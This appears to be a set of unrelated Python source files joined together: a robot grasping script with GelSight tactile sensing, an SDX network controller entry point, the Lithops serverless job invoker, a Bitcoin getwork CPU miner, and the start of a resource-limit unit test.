goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=des_orientation_EE, limb=limb,
joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
# Randomize the rotation too
random_orientation = orientation_downward(np.random.uniform(0, np.pi))
goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=random_orientation, limb=limb,
joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
# Go down to the random position and let go of the object
goto_EE_xyz(goal_xyz=des_EE_xyz + np.array([0, 0, 0.02]), goal_orientation=random_orientation, limb=limb,
joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
gripper.open(speed=100) # Open gripper
time.sleep(0.5)
# Go up, but a little higher than before
des_EE_xyz_above[2] = 0.60
goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=random_orientation, limb=limb,
joint_pos_publisher=desired_joint_pos_publisher, speed=0.2)
# Get image from GelSights and update plot
gelA_img_r = gelSightA.get_image()
gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB)
gelB_img_r = gelSightB.get_image()
gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB)
gelA_img.set_data(gelA_img_r)
gelB_img.set_data(gelB_img_r)
plt.draw()
plt.ion()
plt.show()
# Go back to rest position
goto_rest_pos(limb=limb, joint_pos_publisher=desired_joint_pos_publisher, torque=True, speed=0.2)
else:
# If we are not gripping the object, i.e. the grasp failed, we move to the resting position immediately.
gripper.open(speed=200)
goto_rest_pos(limb=limb, joint_pos_publisher=desired_joint_pos_publisher, torque=True, speed=0.2)
# Reset the gripper
gripper.homing()
# Stop recording data for this iteration
dr_tc.stop_record()
if save_parallel:
if comp_task is not None:
ut.tic('Waiting for comp_task')
if not comp_task.wait():
raise RuntimeError('Compression task failed!')
ut.toc()
comp_task = dr.CompressionTask(dr_tc, pool)
comp_task.run_async()
else:
comp_task = dr.CompressionTask(dr_tc, pool)
comp_task.run_sync()
import gc;
gc.collect()
end_time = rospy.get_time()
print("Time of grasp:", end_time - start_time)
# Stop recorder
# TODO: move end_processes outside of data_recorder
dr_tc.end_processes()
# kinectA.end_process()
# kinectB.end_process()
# gelSightB.end_process()
# gelSightA.end_process()
rospy.signal_shutdown("Example finished.")
def testGelSights():
# rospy.init_node('Testing')
init_robot('right')
# Start Topic for the Gelsight
# os.system("for pid in $(ps -ef | grep 'gelsight' | awk '{print $2}'); do kill -9 $pid; done")
# os.system(
# 'roslaunch manu_sawyer gelsightA_driver.launch > /home/guser/catkin_ws/src/manu_research/temp/gelsightA_driver.txt 2>&1 &')
# os.system(
# 'roslaunch manu_sawyer gelsightB_driver.launch > /home/guser/catkin_ws/src/manu_research/temp/gelsightB_driver.txt 2>&1 &')
# time.sleep(10)
gelSightA = GelSightA()
# time.sleep(10)
gelSightB = GelSightB()
time.sleep(10)
gelA_ini = gelSightA.get_image()
gelB_ini = gelSightB.get_image()
model_path = "/home/manu/ros_ws/src/manu_research/manu_sawyer/src/tensorflow_model_is_gripping/training/net.tf-3000"
model_path = "/home/manu/ros_ws/src/manu_research/manu_sawyer/src/tensorflow_model_is_gripping/training/net.tf-4600"
net = press.NetClf(model_path, "/gpu:0")
cmap = pylab.cm.RdYlGn
i = 0
while True:
frameA = gelSightA.get_image()
frameB = gelSightB.get_image()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
probA = net.predict(frameA, gelA_ini)
probB = net.predict(frameB, gelB_ini)
colorA = map(int, 255 * np.array(cmap(probA))[:3])
colorB = map(int, 255 * np.array(cmap(probB))[:3])
cv2.putText(frameA, '%.2f' % probA, (0, 50),
cv2.FONT_HERSHEY_SIMPLEX, 1, colorA)
cv2.putText(frameB, '%.2f' % probB, (0, 50),
cv2.FONT_HERSHEY_SIMPLEX, 1, colorB)
cv2.imshow('frameA', frameA)
cv2.imshow('frameB', frameB)
if __name__ == '__main__':
# testGelSights()
main()
|
__main__.py | #!/usr/bin/env python3
import connexion
from swagger_server import encoder
from swagger_server.messaging.rpc_queue_consumer import *
from swagger_server.utils.db_utils import *
from optparse import OptionParser
import argparse
import time
import threading
import logging
import json
# make sure to install datamodel:
# https://github.com/atlanticwave-sdx/datamodel
from datamodel.sdxdatamodel import parsing
from datamodel.sdxdatamodel import topologymanager
from datamodel.sdxdatamodel import validation
from datamodel.sdxdatamodel.validation.topologyvalidator import TopologyValidator
from datamodel.sdxdatamodel.parsing.topologyhandler import TopologyHandler
from datamodel.sdxdatamodel.topologymanager.manager import TopologyManager
from datamodel.sdxdatamodel.topologymanager.grenmlconverter import GrenmlConverter
from datamodel.sdxdatamodel.parsing.exceptions import DataModelException
def is_json(myjson):
try:
json.loads(myjson)
except ValueError as e:
return False
return True
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
def start_consumer(thread_queue, db_instance):
logger = logging.getLogger(__name__)
logging.getLogger("pika").setLevel(logging.WARNING)
MESSAGE_ID = 0
HEARTBEAT_ID = 0
rpc = RpcConsumer(thread_queue, '')
t1 = threading.Thread(target=rpc.start_consumer, args=())
t1.start()
manager = TopologyManager()
num_domain_topos = 0
if db_instance.read_from_db('num_domain_topos') is not None:
db_instance.add_key_value_pair_to_db('num_domain_topos', num_domain_topos)
latest_topo = {}
domain_list = set()
while True:
if not thread_queue.empty():
msg = thread_queue.get()
logger.debug("MQ received message:" + str(msg))
if 'Heart Beat' in str(msg):
HEARTBEAT_ID += 1
logger.debug('Heart beat received. ID: ' + str(HEARTBEAT_ID))
else:
logger.info('Saving to database.')
if is_json(msg):
if 'version' in str(msg):
logger.info("MQ received message:" + str(msg))
msg_json = json.loads(msg)
msg_id = msg_json["id"]
msg_version = msg_json["version"]
lc_queue_name = msg_json["lc_queue_name"]
logger.debug("---lc_queue_name:---")
logger.debug(lc_queue_name)
domain_name = find_between(msg_id, "topology:", ".net")
msg_json["domain_name"] = domain_name
db_msg_id = str(msg_id) + "-" + str(msg_version)
# add message to db
db_instance.add_key_value_pair_to_db(db_msg_id, msg)
logger.info('Save to database complete.')
logger.info('message ID:' + str(db_msg_id))
# Update existing topology
if domain_name in domain_list:
logger.info("updating topo")
manager.update_topology(msg_json)
# Add new topology
else:
domain_list.add(domain_name)
logger.info("adding topo")
manager.add_topology(msg_json)
if db_instance.read_from_db('num_domain_topos') is None:
num_domain_topos = 1
db_instance.add_key_value_pair_to_db('num_domain_topos', num_domain_topos)
else:
num_domain_topos = db_instance.read_from_db('num_domain_topos')
num_domain_topos = int(num_domain_topos) + 1
db_instance.add_key_value_pair_to_db('num_domain_topos', num_domain_topos)
logger.info("adding topo to db:")
db_key = 'LC-' + str(num_domain_topos)
db_instance.add_key_value_pair_to_db(db_key, json.dumps(msg_json))
latest_topo = json.dumps(manager.get_topology().to_dict())
# use 'latest_topo' as PK to save latest topo to db
db_instance.add_key_value_pair_to_db('latest_topo', latest_topo)
logger.info('Save to database complete.')
else:
logger.info('got message from MQ: ' + str(msg))
else:
db_instance.add_key_value_pair_to_db(MESSAGE_ID, msg)
logger.debug('Save to database complete.')
logger.debug('message ID:' + str(MESSAGE_ID))
value = db_instance.read_from_db(MESSAGE_ID)
logger.debug('got value from DB:')
logger.debug(value)
MESSAGE_ID += 1
def main():
# Sleep 7 seconds waiting for RabbitMQ to be ready
# time.sleep(7)
logging.basicConfig(level=logging.INFO)
# Run swagger service
app = connexion.App(__name__, specification_dir='./swagger/')
app.app.json_encoder = encoder.JSONEncoder
app.add_api('swagger.yaml', arguments={'title': 'SDX-Controller'}, pythonic_params=True)
# Run swagger in a thread
threading.Thread(target=lambda: app.run(port=8080)).start()
# app.run(port=8080)
DB_NAME = os.environ.get('DB_NAME') + '.sqlite3'
MANIFEST = os.environ.get('MANIFEST')
# Get DB connection and tables set up.
db_tuples = [('config_table', "test-config")]
db_instance = DbUtils()
db_instance._initialize_db(DB_NAME, db_tuples)
# amqp_url = 'amqp://guest:guest@aw-sdx-monitor.renci.org:5672/%2F'
thread_queue = Queue()
start_consumer(thread_queue, db_instance)
if __name__ == '__main__':
main()
|
invokers.py | #
# (C) Copyright IBM Corp. 2020
# (C) Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import pika
import time
import random
import queue
import logging
import multiprocessing as mp
from threading import Thread
from types import SimpleNamespace
from concurrent.futures import ThreadPoolExecutor
from lithops.version import __version__
from lithops.future import ResponseFuture
from lithops.config import extract_storage_config
from lithops.utils import version_str, is_lithops_worker, is_unix_system
from lithops.storage.utils import create_job_key
from lithops.constants import LOGGER_LEVEL, LITHOPS_TEMP_DIR
from lithops.util.metrics import PrometheusExporter
logger = logging.getLogger(__name__)
class Invoker:
"""
Abstract invoker class
"""
def __init__(self, config, executor_id, internal_storage, compute_handler):
log_level = logger.getEffectiveLevel()
self.log_active = log_level != logging.WARNING
self.log_level = LOGGER_LEVEL if not self.log_active else log_level
self.config = config
self.executor_id = executor_id
self.storage_config = extract_storage_config(self.config)
self.internal_storage = internal_storage
self.compute_handler = compute_handler
self.is_lithops_worker = is_lithops_worker()
self.workers = self.config['lithops'].get('workers')
logger.debug('ExecutorID {} - Total available workers: {}'
.format(self.executor_id, self.workers))
prom_enabled = self.config['lithops'].get('monitoring', False)
prom_config = self.config.get('prometheus', {})
self.prometheus = PrometheusExporter(prom_enabled, prom_config)
mode = self.config['lithops']['mode']
self.runtime_name = self.config[mode]['runtime']
def select_runtime(self, job_id, runtime_memory):
"""
Create a runtime and return metadata
"""
raise NotImplementedError
def run(self, job):
"""
Run a job
"""
raise NotImplementedError
def stop(self):
"""
Stop invoker-related processes
"""
pass
class StandaloneInvoker(Invoker):
"""
Module responsible to perform the invocations against the Standalone backend
"""
def __init__(self, config, executor_id, internal_storage, compute_handler):
super().__init__(config, executor_id, internal_storage, compute_handler)
def select_runtime(self, job_id, runtime_memory):
"""
Return the runtime metadata
"""
log_msg = ('ExecutorID {} | JobID {} - Selected Runtime: {} '
.format(self.executor_id, job_id, self.runtime_name))
logger.info(log_msg)
runtime_key = self.compute_handler.get_runtime_key(self.runtime_name)
runtime_meta = self.internal_storage.get_runtime_meta(runtime_key)
if not runtime_meta:
logger.info('Runtime {} is not yet installed'.format(self.runtime_name))
runtime_meta = self.compute_handler.create_runtime(self.runtime_name)
self.internal_storage.put_runtime_meta(runtime_key, runtime_meta)
py_local_version = version_str(sys.version_info)
py_remote_version = runtime_meta['python_ver']
if py_local_version != py_remote_version:
raise Exception(("The indicated runtime '{}' is running Python {} and it "
"is not compatible with the local Python version {}")
.format(self.runtime_name, py_remote_version, py_local_version))
return runtime_meta
def run(self, job):
"""
Run a job
"""
job.runtime_name = self.runtime_name
self.prometheus.send_metric(name='job_total_calls',
value=job.total_calls,
labels=(
('job_id', job.job_id),
('function_name', job.function_name)
))
payload = {'config': self.config,
'log_level': self.log_level,
'executor_id': job.executor_id,
'job_id': job.job_id,
'job_description': job.__dict__,
'lithops_version': __version__}
self.compute_handler.run_job(payload)
log_msg = ('ExecutorID {} | JobID {} - {}() Invocation done - Total: {} activations'
.format(job.executor_id, job.job_id, job.function_name, job.total_calls))
logger.info(log_msg)
futures = []
for i in range(job.total_calls):
call_id = "{:05d}".format(i)
fut = ResponseFuture(call_id, job,
job.metadata.copy(),
self.storage_config)
fut._set_state(ResponseFuture.State.Invoked)
futures.append(fut)
return futures
class ServerlessInvoker(Invoker):
"""
Module responsible to perform the invocations against the serverless backend
"""
REMOTE_INVOKER_MEMORY = 2048
INVOKER_PROCESSES = 2
def __init__(self, config, executor_id, internal_storage, compute_handler):
super().__init__(config, executor_id, internal_storage, compute_handler)
self.remote_invoker = self.config['serverless'].get('remote_invoker', False)
self.use_threads = (self.is_lithops_worker
or not is_unix_system()
or mp.get_start_method() != 'fork')
self.invokers = []
self.ongoing_activations = 0
if self.use_threads:
self.token_bucket_q = queue.Queue()
self.pending_calls_q = queue.Queue()
self.running_flag = SimpleNamespace(value=0)
self.INVOKER = Thread
else:
self.token_bucket_q = mp.Queue()
self.pending_calls_q = mp.Queue()
self.running_flag = mp.Value('i', 0)
self.INVOKER = mp.Process
self.job_monitor = JobMonitor(self.config, self.internal_storage, self.token_bucket_q)
logger.debug('ExecutorID {} - Serverless invoker created'.format(self.executor_id))
def select_runtime(self, job_id, runtime_memory):
"""
Return the runtime metadata
"""
if not runtime_memory:
runtime_memory = self.config['serverless']['runtime_memory']
timeout = self.config['serverless']['runtime_timeout']
log_msg = ('ExecutorID {} | JobID {} - Selected Runtime: {} - {}MB '
.format(self.executor_id, job_id, self.runtime_name, runtime_memory))
logger.info(log_msg)
runtime_key = self.compute_handler.get_runtime_key(self.runtime_name, runtime_memory)
runtime_meta = self.internal_storage.get_runtime_meta(runtime_key)
if not runtime_meta:
logger.info('Runtime {} with {}MB is not yet installed'.format(self.runtime_name, runtime_memory))
runtime_meta = self.compute_handler.create_runtime(self.runtime_name, runtime_memory, timeout)
self.internal_storage.put_runtime_meta(runtime_key, runtime_meta)
py_local_version = version_str(sys.version_info)
py_remote_version = runtime_meta['python_ver']
if py_local_version != py_remote_version:
raise Exception(("The indicated runtime '{}' is running Python {} and it "
"is not compatible with the local Python version {}")
.format(self.runtime_name, py_remote_version, py_local_version))
return runtime_meta
def _start_invoker_process(self):
"""Starts the invoker process responsible to spawn pending calls
in background.
"""
for inv_id in range(self.INVOKER_PROCESSES):
p = self.INVOKER(target=self._run_invoker_process, args=(inv_id,))
self.invokers.append(p)
p.daemon = True
p.start()
def _run_invoker_process(self, inv_id):
"""Run process that implements token bucket scheduling approach"""
logger.debug('ExecutorID {} - Invoker process {} started'
.format(self.executor_id, inv_id))
with ThreadPoolExecutor(max_workers=250) as executor:
while True:
try:
self.token_bucket_q.get()
job, call_id = self.pending_calls_q.get()
except KeyboardInterrupt:
break
if self.running_flag.value:
executor.submit(self._invoke, job, call_id)
else:
break
logger.debug('ExecutorID {} - Invoker process {} finished'
.format(self.executor_id, inv_id))
def _invoke(self, job, call_id):
"""Method used to perform the actual invocation against the
compute backend.
"""
payload = {'config': self.config,
'log_level': self.log_level,
'func_key': job.func_key,
'data_key': job.data_key,
'extra_env': job.extra_env,
'execution_timeout': job.execution_timeout,
'data_byte_range': job.data_ranges[int(call_id)],
'executor_id': job.executor_id,
'job_id': job.job_id,
'call_id': call_id,
'host_submit_tstamp': time.time(),
'lithops_version': __version__,
'runtime_name': job.runtime_name,
'runtime_memory': job.runtime_memory}
# do the invocation
start = time.time()
activation_id = self.compute_handler.invoke(job.runtime_name, job.runtime_memory, payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
if not activation_id:
# reached quota limit
time.sleep(random.randint(0, 5))
self.pending_calls_q.put((job, call_id))
self.token_bucket_q.put('#')
return
logger.debug('ExecutorID {} | JobID {} - Function call {} done! ({}s) - Activation'
' ID: {}'.format(job.executor_id, job.job_id, call_id, resp_time, activation_id))
def _invoke_remote(self, job):
"""Method used to send a job_description to the remote invoker."""
start = time.time()
payload = {'config': self.config,
'log_level': self.log_level,
'executor_id': job.executor_id,
'job_id': job.job_id,
'job_description': job.__dict__,
'remote_invoker': True,
'invokers': 4,
'lithops_version': __version__}
activation_id = self.compute_handler.invoke(job.runtime_name, self.REMOTE_INVOKER_MEMORY, payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
if activation_id:
logger.debug('ExecutorID {} | JobID {} - Remote invoker call done! ({}s) - Activation'
' ID: {}'.format(job.executor_id, job.job_id, resp_time, activation_id))
else:
raise Exception('Unable to spawn remote invoker')
def run(self, job):
"""
Run a job described in job_description
"""
job.runtime_name = self.runtime_name
try:
while True:
self.token_bucket_q.get_nowait()
self.ongoing_activations -= 1
except Exception:
pass
self.prometheus.send_metric(name='job_total_calls',
value=job.total_calls,
labels=(
('job_id', job.job_id),
('function_name', job.function_name)
))
if self.remote_invoker:
"""
Remote Invocation
Use a single cloud function to perform all the function invocations
"""
old_stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
self.select_runtime(job.job_id, self.REMOTE_INVOKER_MEMORY)
sys.stdout = old_stdout
log_msg = ('ExecutorID {} | JobID {} - Starting function '
'invocation: {}() - Total: {} activations'
.format(job.executor_id, job.job_id,
job.function_name, job.total_calls))
logger.info(log_msg)
th = Thread(target=self._invoke_remote, args=(job,), daemon=True)
th.start()
time.sleep(0.1)
else:
"""
Normal Invocation
Use local threads to perform all the function invocations
"""
try:
if self.running_flag.value == 0:
self.ongoing_activations = 0
self.running_flag.value = 1
self._start_invoker_process()
log_msg = ('ExecutorID {} | JobID {} - Starting function '
'invocation: {}() - Total: {} activations'
.format(job.executor_id, job.job_id,
job.function_name, job.total_calls))
logger.info(log_msg)
if self.ongoing_activations < self.workers:
callids = range(job.total_calls)
total_direct = self.workers - self.ongoing_activations
callids_to_invoke_direct = callids[:total_direct]
callids_to_invoke_nondirect = callids[total_direct:]
self.ongoing_activations += len(callids_to_invoke_direct)
logger.debug('ExecutorID {} | JobID {} - Free workers: '
'{} - Going to invoke {} function activations'
.format(job.executor_id, job.job_id, total_direct,
len(callids_to_invoke_direct)))
def _callback(future):
future.result()
executor = ThreadPoolExecutor(job.invoke_pool_threads)
for i in callids_to_invoke_direct:
call_id = "{:05d}".format(i)
future = executor.submit(self._invoke, job, call_id)
future.add_done_callback(_callback)
time.sleep(0.1)
# Put into the queue the rest of the callids to invoke within the process
if callids_to_invoke_nondirect:
logger.debug('ExecutorID {} | JobID {} - Putting remaining '
'{} function invocations into pending queue'
.format(job.executor_id, job.job_id,
len(callids_to_invoke_nondirect)))
for i in callids_to_invoke_nondirect:
call_id = "{:05d}".format(i)
self.pending_calls_q.put((job, call_id))
else:
logger.debug('ExecutorID {} | JobID {} - Ongoing activations '
'reached {} workers, queuing {} function invocations'
.format(job.executor_id, job.job_id, self.workers,
job.total_calls))
for i in range(job.total_calls):
call_id = "{:05d}".format(i)
self.pending_calls_q.put((job, call_id))
self.job_monitor.start_job_monitoring(job)
except (KeyboardInterrupt, Exception) as e:
self.stop()
raise e
# Create all futures
futures = []
for i in range(job.total_calls):
call_id = "{:05d}".format(i)
fut = ResponseFuture(call_id, job,
job.metadata.copy(),
self.storage_config)
fut._set_state(ResponseFuture.State.Invoked)
futures.append(fut)
return futures
def stop(self):
"""
Stop the invoker process and JobMonitor
"""
self.job_monitor.stop()
if self.invokers:
logger.debug('ExecutorID {} - Stopping invoker'
.format(self.executor_id))
self.running_flag.value = 0
for invoker in self.invokers:
self.token_bucket_q.put('#')
self.pending_calls_q.put((None, None))
while not self.pending_calls_q.empty():
try:
self.pending_calls_q.get(False)
except Exception:
pass
self.invokers = []
class CustomizedRuntimeInvoker(ServerlessInvoker):
"""
Module responsible to perform the invocations against the serverless backend in realtime environments
currently differs from ServerlessInvoker only by having one method that provides extension of specified environment with
map function and modules to optimize performance in real time use cases by avoiding repeated data transfers from storage to
action containers on each execution
"""
def run(self, job):
"""
Extend runtime and run a job described in job_description
"""
logger.warning("Warning, you are using customized runtime feature. "
"Please, notice that the map function code and dependencies "
"are stored and uploaded to docker registry. "
"To protect your privacy, use a private docker registry instead of public docker hub.")
self._extend_runtime(job)
return super().run(job)
# If runtime not exists yet, build unique docker image and register runtime
def _extend_runtime(self, job):
runtime_memory = self.config['serverless']['runtime_memory']
base_docker_image = self.runtime_name
uuid = job.ext_runtime_uuid
ext_runtime_name = "{}:{}".format(base_docker_image.split(":")[0], uuid)
# update job with new extended runtime name
self.runtime_name = ext_runtime_name
runtime_key = self.compute_handler.get_runtime_key(self.runtime_name, runtime_memory)
runtime_meta = self.internal_storage.get_runtime_meta(runtime_key)
if not runtime_meta:
timeout = self.config['serverless']['runtime_timeout']
logger.debug('Creating runtime: {}, memory: {}MB'.format(ext_runtime_name, runtime_memory))
runtime_temorary_directory = '/'.join([LITHOPS_TEMP_DIR, os.path.dirname(job.func_key)])
modules_path = '/'.join([runtime_temorary_directory, 'modules'])
ext_docker_file = '/'.join([runtime_temorary_directory, "Dockerfile"])
# Generate Dockerfile extended with function dependencies and function
with open(ext_docker_file, 'w') as df:
df.write('\n'.join([
'FROM {}'.format(base_docker_image),
'ENV PYTHONPATH={}:${}'.format(modules_path, 'PYTHONPATH'),
# set python path to point to dependencies folder
'COPY . {}'.format(runtime_temorary_directory)
]))
# Build new extended runtime tagged by function hash
cwd = os.getcwd()
os.chdir(runtime_temorary_directory)
self.compute_handler.build_runtime(ext_runtime_name, ext_docker_file)
os.chdir(cwd)
runtime_meta = self.compute_handler.create_runtime(ext_runtime_name, runtime_memory, timeout=timeout)
self.internal_storage.put_runtime_meta(runtime_key, runtime_meta)
else:
if not self.log_active:
print()
py_local_version = version_str(sys.version_info)
py_remote_version = runtime_meta['python_ver']
if py_local_version != py_remote_version:
raise Exception(("The indicated runtime '{}' is running Python {} and it "
"is not compatible with the local Python version {}")
.format(self.runtime_name, py_remote_version, py_local_version))
return runtime_meta
class JobMonitor:
def __init__(self, lithops_config, internal_storage, token_bucket_q):
self.config = lithops_config
self.internal_storage = internal_storage
self.token_bucket_q = token_bucket_q
self.is_lithops_worker = is_lithops_worker()
self.monitors = {}
self.rabbitmq_monitor = self.config['lithops'].get('rabbitmq_monitor', False)
if self.rabbitmq_monitor:
self.rabbit_amqp_url = self.config['rabbitmq'].get('amqp_url')
def stop(self):
for job_key in self.monitors:
self.monitors[job_key]['should_run'] = False
def get_active_jobs(self):
active_jobs = 0
for job_key in self.monitors:
if self.monitors[job_key]['thread'].is_alive():
active_jobs += 1
return active_jobs
def start_job_monitoring(self, job):
logger.debug('ExecutorID {} | JobID {} - Starting job monitoring'
.format(job.executor_id, job.job_id))
if self.rabbitmq_monitor:
th = Thread(target=self._job_monitoring_rabbitmq, args=(job,))
else:
th = Thread(target=self._job_monitoring_os, args=(job,))
if not self.is_lithops_worker:
th.daemon = True
job_key = create_job_key(job.executor_id, job.job_id)
self.monitors[job_key] = {'thread': th, 'should_run': True}
th.start()
def _job_monitoring_os(self, job):
total_callids_done = 0
job_key = create_job_key(job.executor_id, job.job_id)
while self.monitors[job_key]['should_run'] and total_callids_done < job.total_calls:
time.sleep(1)
callids_running, callids_done = self.internal_storage.get_job_status(job.executor_id, job.job_id)
total_new_tokens = len(callids_done) - total_callids_done
total_callids_done = total_callids_done + total_new_tokens
for i in range(total_new_tokens):
if self.monitors[job_key]['should_run']:
self.token_bucket_q.put('#')
else:
break
logger.debug('ExecutorID {} | JobID {} - Job monitoring finished'
.format(job.executor_id, job.job_id))
def _job_monitoring_rabbitmq(self, job):
total_callids_done = 0
job_key = create_job_key(job.executor_id, job.job_id)
exchange = 'lithops-{}'.format(job_key)
queue_1 = '{}-1'.format(exchange)
params = pika.URLParameters(self.rabbit_amqp_url)
connection = pika.BlockingConnection(params)
channel = connection.channel()
def callback(ch, method, properties, body):
nonlocal total_callids_done
call_status = json.loads(body.decode("utf-8"))
if call_status['type'] == '__end__':
if self.monitors[job_key]['should_run']:
self.token_bucket_q.put('#')
total_callids_done += 1
if total_callids_done == job.total_calls or \
not self.monitors[job_key]['should_run']:
ch.stop_consuming()
channel.basic_consume(callback, queue=queue_1, no_ack=True)
channel.start_consuming()
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 37983
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_resource.py | import resource
from multiprocessing import Manager, Process
import pytest
from pji.control.model import ResourceLimit
@pytest.mark.unittest
class TestControlModelResource:
def test_properties(self):
rl = ResourceLimit(
max_stack=1,
max_memory=2,
max_cpu_time=3,
max_real_time=4,
max_output_size=5,
max_process_number=6,
)
assert rl.max_stack == 1
assert rl.max_memory == 2
assert rl.max_cpu_time == 3
assert rl.max_real_time == 4
assert rl.max_output_size == 5
assert rl.max_process_number == 6
def test_load_from_json(self):
rl = ResourceLimit.load_from_json(dict(
max_stack=1,
max_memory=2,
max_cpu_time=3,
